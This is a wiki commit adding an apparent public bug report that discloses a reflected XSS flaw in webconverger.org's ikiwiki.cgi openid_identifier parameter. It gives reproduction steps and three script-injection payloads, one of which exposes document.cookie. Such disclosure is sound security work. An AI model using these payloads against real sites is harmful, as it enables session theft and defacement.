(no commit message)

author https://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw <Raghav@web>

Tue, 24 Mar 2015 05:51:44 +0000 (01:51 -0400)

committer admin <admin@branchable.com>

Tue, 24 Mar 2015 05:51:44 +0000 (01:51 -0400)
author https://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw <Raghav@web>
Tue, 24 Mar 2015 05:51:44 +0000 (01:51 -0400)
committer admin <admin@branchable.com>
Tue, 24 Mar 2015 05:51:44 +0000 (01:51 -0400)
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.html b/doc/bugs/XSS_Alert...__33____33____33__.html

new file mode 100644 (file)

index 0000000..24a1a3a
--- /dev/null
+++ b/doc/bugs/XSS_Alert...__33____33____33__.html
@@ -0,0 +1,25 @@
+Respected Sir,
+Your website "webconverger.org" is vulnerable to XSS Attack.
+
+Vulnerable Links:
+webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
+
+How To Reproduce The Vulnerability :
+1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
+2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
+3. forward the request
+
+XSS Payload :
+1. "></script><script>prompt(909043)</script>
+2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
+3. "></script><script>prompt(document.cookie)</script>
+
+NOTE : Proof of concept is attached.
+
+
+Thank You...!!
+
+
+Your Faithfully,
+Raghav Bisht
+raghav007bisht@gmail.com
author	https://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw <Raghav@web>
	Tue, 24 Mar 2015 05:51:44 +0000 (01:51 -0400)
committer	admin <admin@branchable.com>
	Tue, 24 Mar 2015 05:51:44 +0000 (01:51 -0400)